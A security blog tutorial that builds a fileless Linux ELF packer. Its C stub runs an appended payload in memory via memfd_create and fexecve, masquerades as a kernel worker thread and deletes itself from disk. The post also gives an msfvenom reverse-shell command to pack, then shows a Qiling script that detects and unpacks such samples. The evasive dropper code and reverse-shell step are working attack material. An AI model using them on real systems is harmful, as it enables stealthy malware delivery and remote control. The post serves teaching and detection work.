Unpacking In-Memory Malware with Qiling

Malware engineering often relies on operating system primitives to execute and propagate a sample without detection. Linux is no exception, and today we’ll explore one such primitive that has been gaining traction in malware targeting Linux-based IoT devices and servers.

Linux kernel 3.17 introduced the memfd_create system call. Paired with fexecve (a libc function, which recent glibc versions implement on top of the execveat system call added in Linux 3.19), it allows for the creation and execution of anonymous files backed by RAM without those files ever existing on disk. Looking at memfd_create’s manpage:

SYNOPSIS
       int memfd_create(const char *name, unsigned int flags);

DESCRIPTION
       memfd_create() creates an anonymous file and returns a file
       descriptor that refers to it.  The file behaves like a regular
       file, and so can be modified, truncated, memory-mapped, and so
       on.  However, unlike a regular file, it lives in RAM and has a
       volatile backing storage.  Once all references to the file are
       dropped, it is automatically released.

As you may have already figured out, this makes for a very attractive payload delivery and evasion technique. It has enabled malware, such as samples that abuse the Ezuri loader, to thrive in the wild: dropped samples evade initial detection by loading and executing programs in-memory.
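To make the manpage description concrete, here is a minimal Python sketch of the same primitive. It assumes Linux with procfs mounted and Python 3.8 or newer (where os.memfd_create is available); the helper name memfd_roundtrip is made up for illustration. It writes some bytes into an anonymous file and reads them back through /proc/self/fd/, showing that nothing ever needs to exist on disk.

```python
import os

def memfd_roundtrip(name, payload):
    """Write payload into an anonymous RAM-backed file and read it back by path."""
    fd = os.memfd_create(name, 0)  # Linux-only, Python 3.8+
    try:
        os.write(fd, payload)
        path = f"/proc/self/fd/{fd}"
        # The symlink target carries the name we chose, typically "/memfd:<name> (deleted)"
        link = os.readlink(path)
        # Reopen through procfs: a regular-looking file with no on-disk backing
        with open(path, "rb") as f:
            return f.read(), link
    finally:
        os.close(fd)
```

Calling memfd_roundtrip("demo", b"hello") should hand back the same bytes along with the symlink target, which is where the name passed to memfd_create becomes visible.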

Many really good blog posts have already covered these syscalls and their use in developing malware, so in this post we’re going to do things a little differently and take a two-fold approach:

  • First, let’s develop our own simple “offensive packer”, which will harness this fileless technique to create a packed dropper that loads our implant and removes itself from disk after execution.
  • Then, switching gears completely, we’ll use dynamic emulation to detect and unpack the original ELF sample from the packed executable.

Pack it up!

Let’s write an ELF packer! We’ll implement something that works in the following manner, with a stub written in C and a packer written in Golang:

  1. Compile a stub program, which will parse itself, extract the attached implant that we want to execute, and map and execute it in-memory. We’ll rely on a modified and abridged version of the PT_NOTE infection vector: storing the file offset and size of the compressed implant in the PT_NOTE segment present in every ELF (except Golang and proprietary executables).
  2. The original payload that we want to execute in-memory is injected into our stub, and the PT_NOTE segment is modified to point to it.
  3. The packed stub can now run, load the payload, and delete itself from disk as it executes in-memory.
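The layout described in the steps above can be sketched in a few lines of Python. This is an illustrative model rather than ward’s actual code: it assumes a little-endian ELF64 stub, and the helper names find_pt_note, pack and carve are hypothetical. pack points the first PT_NOTE header at the end of the stub and appends the payload; carve does the reverse lookup, which is roughly what the stub does to itself at run time.

```python
import struct

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # ELF64 file header (64 bytes)
PHDR = struct.Struct("<IIQQQQQQ")          # ELF64 program header (56 bytes)
PT_NOTE = 4

def find_pt_note(elf):
    """Return the file position of the first PT_NOTE program header."""
    fields = EHDR.unpack_from(elf, 0)
    if fields[0][:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    e_phoff, e_phentsize, e_phnum = fields[5], fields[9], fields[10]
    for i in range(e_phnum):
        pos = e_phoff + i * e_phentsize
        if PHDR.unpack_from(elf, pos)[0] == PT_NOTE:
            return pos
    raise ValueError("no PT_NOTE segment")

def pack(stub, payload):
    """Point PT_NOTE at the end of the stub and append the payload there."""
    pos = find_pt_note(stub)
    hdr = list(PHDR.unpack_from(stub, pos))
    hdr[2] = len(stub)     # p_offset: payload starts where the stub ends
    hdr[5] = len(payload)  # p_filesz: payload length
    out = bytearray(stub)
    PHDR.pack_into(out, pos, *hdr)
    return bytes(out) + payload

def carve(packed):
    """Read p_offset and p_filesz back out of PT_NOTE and slice out the payload."""
    hdr = PHDR.unpack_from(packed, find_pt_note(packed))
    offset, size = hdr[2], hdr[5]
    return packed[offset:offset + size]
```

For any stub that has a PT_NOTE header, carve(pack(stub, payload)) should return the payload unchanged.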

For both simplicity and personal preference, we’ll refrain from writing a loader that reads an ELF through a network socket, and instead pack and distribute the compressed/encrypted executable together with the stub program that loads it. This deviates from how some loaders/droppers stay truly “fileless”, but it does remove the need for networking facilities to drop a shell.

This packer, which I’ve called ward, is open-sourced here! For brevity, I’ll only include snippets of the source code that demonstrate the core concepts, so please check out the full implementation for a more in-depth understanding of its functionality.

The first step is to implement our stub program, which will be in C. Our technique requires us to first parse ourselves so that we can retrieve ELF metadata:

// open ourselves for reading
if ((fd = open(argv[0], O_RDONLY, 0)) < 0)
    die(-1, "cannot read ourselves as file");

// initialize libelf and check that its version is supported
if (elf_version(EV_CURRENT) == EV_NONE)
    die(-1, elf_errmsg(-1));

// open an ELF descriptor for reading our own file
if ((e = elf_begin(fd, ELF_C_READ, NULL)) == NULL)
    die(-1, elf_errmsg(-1));

// parse out number of program headers
size_t n;
int ret = elf_getphdrnum(e, &n);
if (ret != 0)
    die(-1, "cannot parse any program headers");

Then, find the first PT_NOTE segment and retrieve two attributes, p_filesz and p_offset, which denote the size and file offset of the packed payload we want to read:

// get the first PT_NOTE segment we find
GElf_Phdr phdr;
int found = 0;
for (size_t i = 0; i < n; i++) {
    // copy the header into storage that outlives the loop body
    if (gelf_getphdr(e, i, &phdr) == NULL)
        die(-1, "cannot get program header");

    if (phdr.p_type == PT_NOTE) {
        found = 1;
        break;
    }
}

if (!found)
    die(-1, "cannot find PT_NOTE segment to further parse");

// get attributes for PT_NOTE segment
Elf64_Off offset = phdr.p_offset;
Elf64_Xword size = phdr.p_filesz;

With this information, we’re now able to parse out the compressed executable we’ve appended to the binary and get it ready for in-memory execution. This is also a good time to incorporate any type of decryption, as Ezuri does with AES, but we’ll leave that as a TODO for a future revision.

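// read packed executable from file offset (heap buffer, as the payload may be large)
char *data = malloc(size);
if (data == NULL)
    die(-1, "cannot allocate buffer for packed executable");
// pread takes the offset directly, so no lseek is needed
if (pread(fd, data, size, offset) != (ssize_t) size)
    die(-1, "cannot read packed executable");
close(fd);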

As per the manpage, memfd_create requires a name for the anonymous file, which shows up (prefixed with memfd:) as the target of the corresponding symlink under /proc/self/fd/, so we’ll play sneaky and name our eventual process after an arbitrary kernel worker thread to avoid detection:

#define TEMPFILE "[kworker/1:1]"

/* safely write buffer to a given input file descriptor */
static void write_fd(int fd, const char *str, size_t len)
{
    size_t cnt = 0;
    do {
        ssize_t result = write(fd, str + cnt, MIN(len - cnt, 0x7ffff000));
        if (result == -1) 
            die(-1, "writing to memfd failed\n");
        cnt += result;
    } while (cnt != len);
}

...

// create anonymous file mocking a kernel worker thread
fd = memfd_create(TEMPFILE, 0);
if (fd == -1)
    die(fd, "cannot create in-memory fd for code");

// get rid of ourselves on disk for more sneaky evasion
if (remove(argv[0]) != 0)
    die(fd, "cannot remove self");

// write the full ELF data to the in-memory fd and execute
write_fd(fd, data, size);
{
    argv[0] = TEMPFILE;
    fexecve(fd, (char * const *) argv, (char * const *) envp);
}
close(fd);
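The write_fd helper above loops because a single write call may store fewer bytes than requested, and Linux caps one call at 0x7ffff000 bytes. The same idea in a short Python sketch, where write_all and its max_chunk parameter are illustrative names rather than part of ward:

```python
import os

MAX_CHUNK = 0x7ffff000  # same per-call cap as the C helper

def write_all(fd, data, max_chunk=MAX_CHUNK):
    """Keep calling write until every byte of data has reached fd."""
    view = memoryview(data)
    written = 0
    while written < len(view):
        # os.write returns how many bytes were accepted and raises OSError on failure
        written += os.write(fd, view[written:written + max_chunk])
    return written
```

This detail matters for the defensive side later on: a payload may arrive at the anonymous file descriptor in several write calls rather than one.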

At this point, our stub program is done! We’ll move on to building our packer, which handles provisioning the stub and actually performing the injection.

In our Golang packer implementation, we’ll first provision this stub, which we can do by simply wrapping around the compiler of our choice:

// create compilation command
cmd := exec.Command("clang", "-static", "-O2", "-D_FORTIFY_SOURCE=2", "-o",
    out, "main.c", "runtime.c", "-lelf", "-lz")

// execute compilation routine to generate a new binary
if err := cmd.Run(); err != nil {
    return nil, err 
}

Once that’s done and our initial stub is generated, the injection implementation can be seen in the following snippet. Notice that rather than converting the PT_NOTE segment to PT_LOAD, which would be necessary for memory-mapping shellcode to run, we simply point it at the end of the file itself, where we then append the blob of data that represents the compressed ELF. This neat little trick is a modification of the traditional and better-known PT_NOTE infection technique, adapted so that the stub can locate an executable to load and redirect to.

We’ll use a fork of the debug/elf library written by the Binject folks, as it extends the original library by allowing one not only to read and parse the ELF binary format, but also to write and patch its contents.

import "github.com/Binject/debug/elf"

...

func (inj *Injector) InjectBinary() error {

    // we only modify p_filesz to be size of packed ELF, and p_off to be offset in current file
    for _, seg := range inj.StubProgram.Progs {
        if seg.Type == elf.PT_NOTE {
            seg.Filesz = uint64(len(inj.Target))
            seg.Off = uint64(inj.Filesize)
            log.Printf("Offset: %d Size: %d\n", seg.Off, seg.Filesz)
            break
        }
    }

    // append target binary to the end of the stub host
    inj.StubProgram.InsertionEOF = inj.Target

    // get bytes from final stub state
    elfBytes, err := inj.StubProgram.Bytes()
    if err != nil {
        return err
    }
    inj.StubProgram.Close()

    // overwrite original stub with changes in ELF format
    f, err := os.OpenFile(inj.Filepath, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0755)
    if err != nil {
        return err
    }
    defer f.Close()

    // surface short or failed writes instead of silently dropping them
    _, err = f.Write(elfBytes)
    return err
}

That’s it, our packer implementation is complete! Let’s see this in action by packing a copy of ls, and then executing it:

As we can see, running the packed stub executes ls normally, but now in-memory, and the stub itself disappears after execution! Now, we can use this to pack and load reverse shells, such as Metasploit payloads:

$ msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell
$ ward shell

Exfiltrating the Payload

Now that we have a functional packer that handles loading our malicious executable in-memory, it’s time to switch to defense and beat our own work.

I chose to approach unpacking using dynamic emulation, specifically with the popular Qiling framework, which has become part of many security researchers’ arsenals for reverse engineering and vulnerability hunting. Qiling is really cool because it can emulate binaries across a range of instruction sets and operating systems, making it possible to quickly scale up dynamic analyses such as building fuzzers for embedded devices.

Creating the rootfs

To start, we’ll create the rootfs that sandboxes all the files relevant to the execution of our program, and exposes a small filesystem tree that complies with the Filesystem Hierarchy Standard for the emulated program. For many samples that one may choose to analyze, copying over the appropriate rootfs from the Qiling repository’s examples/ subfolder is sufficient. We’ll copy over examples/rootfs/x8664_linux, which already contains some targets in /bin and a copy of a linker and glibc in /lib.

We’ll first instantiate Qiling, passing in inputs for the program we want to analyze, as well as the rootfs sandbox it’ll exist under for execution:


import sys
from qiling import *

ql = Qiling(["sample.packed"], "rootfs", stdout=sys.stdout)

Like many dynamic emulators in the open-source community today, Qiling supports analysis through instrumentation: we can hook our own custom callbacks at the instruction, syscall, or function level to introspect their behavior or the current state of memory, or to re-implement their execution behavior in some manner, as we’ll demonstrate.

Given how we implemented ward earlier, we want to focus on three different system calls: memfd_create, write, and the execveat call that fexecve issues under the hood.

The memfd_create handler is simple: we’ll simply use Qiling to parse out the name for display, and return an arbitrary number to represent our file descriptor:

def memfd_create_hook(ql, name, flags, *args, **kwargs):
    """ Hooks memfd_create, parse name and return arbitrary file descriptor """
    buf = ql.mem.string(name)
    ql.log.info(f"memfd_create called, anonymous file called {buf} created")
    return 123

# memfd_create is syscall number 319
ql.set_syscall(0x13f, memfd_create_hook)

The fexecve hook is similar. Since fexecve reaches the kernel as the execveat syscall here, we hook that syscall number and simply halt emulation, “killswitching” the payload altogether:

def execve_hook(ql, fd, pathname, argv, envp, flags, *args, **kwargs):
    """ Prevent execveat (issued by fexecve) from running and halt """
    ql.log.info("Stopping execution of anonymous file")
    ql.emu_stop()

# execveat is syscall number 322 on x86-64
ql.set_syscall(0x142, execve_hook)

As with any emulation-based unpacking script, the meat of the unpacking lies in the write primitive that actually writes the payload into memory before execution. With our bogus file descriptor 123, we’ll simply instrument write to dump the blob of data being written whenever the first syscall argument is 123. Otherwise, we handle the call appropriately: a write to stdout or stderr is logged as an error and stops the script abruptly, and a write to any other file descriptor is passed through as usual:

# the bogus file descriptor that memfd_create_hook returns
MEMFD = 123

def write_hook(ql, write_fd, write_buf, write_count, *args, **kwargs):
    """ Instrument write only after in-memory fd is instantiated """
    regreturn = 0
    buf = ql.mem.read(write_buf, write_count)

    # stop write to stdout or stderr and output
    if (write_fd == 0x1) or (write_fd == 0x2):
        ql.log.error(f"Program error: {str(bytes(buf))}")
        sys.exit(1)

    # parse out executable if writing to our anonymous fd.
    elif (write_fd == MEMFD):

        # confirm ELF magic number
        if bytes(buf[0:4]) != b'\x7fELF':
            ql.log.error(f"Not a valid ELF executable being read!")
            sys.exit(1)

        ql.log.info("Found valid ELF! Unpacking to disk at `unpacked.elf`.")
        with open("unpacked.elf", "wb") as fd:
            fd.write(buf)

    # write to buffer normally if not with our file descriptor
    else:
        ql.os.fd[write_fd].write(buf)

    regreturn = write_count
    return regreturn

# set our final hook, and run!
ql.set_syscall(0x1, write_hook)
ql.run()
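One caveat with dumping inside the hook: the stub’s write loop may deliver the payload in several write calls, in which case reopening unpacked.elf with "wb" each time would keep only the last chunk, and the ELF magic check would fail on every chunk after the first. A possible refinement, sketched here independently of Qiling with a hypothetical MemfdDumper class, is to accumulate the chunks and write them out once:

```python
ELF_MAGIC = b"\x7fELF"

class MemfdDumper:
    """Collects every chunk written to one tracked file descriptor."""

    def __init__(self, tracked_fd):
        self.tracked_fd = tracked_fd
        self.chunks = bytearray()

    def on_write(self, fd, data):
        """Record data if it targets the tracked fd; return True when consumed."""
        if fd != self.tracked_fd:
            return False
        # only the very first chunk is expected to start with the ELF magic
        if not self.chunks and bytes(data[:4]) != ELF_MAGIC:
            raise ValueError("first chunk does not start with the ELF magic")
        self.chunks += data
        return True

    def dump(self, path):
        """Write the accumulated payload to disk and return its size in bytes."""
        with open(path, "wb") as out:
            return out.write(self.chunks)
```

Under this design, the write hook would hand each buffer to on_write, and the execve hook would call dump("unpacked.elf") just before stopping emulation.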

Get the full unpacker script here.

With our unpacker implementation done, let’s test it out on the packed ls example we created earlier, since we can easily validate that the final unpacked ELF is in fact the original ls we packed:
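One simple way to do that validation is to compare cryptographic digests of the two files. The helpers below are a minimal sketch using only the standard library; sha256_file and same_file are names chosen for this example.

```python
import hashlib

def sha256_file(path, chunk_size=1 << 20):
    """Hash a file incrementally so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()

def same_file(path_a, path_b):
    """True when both files have identical contents."""
    return sha256_file(path_a) == sha256_file(path_b)
```

If same_file("unpacked.elf", ...) returns True when given the path to the original ls copy, the unpacker recovered the payload byte for byte.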

Conclusion

That’s it for now! We implemented a Golang and C-based packer, which can provision a stub and inject a target malicious ELF into it. We then wrote a basic Qiling script to instrument and emulate the syscalls we cared about, dump the executable that is about to be run, and killswitch the stub before it loads and actually executes it.

Writing packers, crypters and obfuscators is fun, and is also a really good learning experience: it not only helps us understand modern techniques for backdoor development, but also gives us opportunities to use binary analysis techniques, like dynamic emulation, and popular frameworks, like Qiling, to conduct deeper analysis. Qiling has a lot more capabilities that I didn’t explore in this post, and I hope to cover it and other binary analysis tooling in more depth in the future!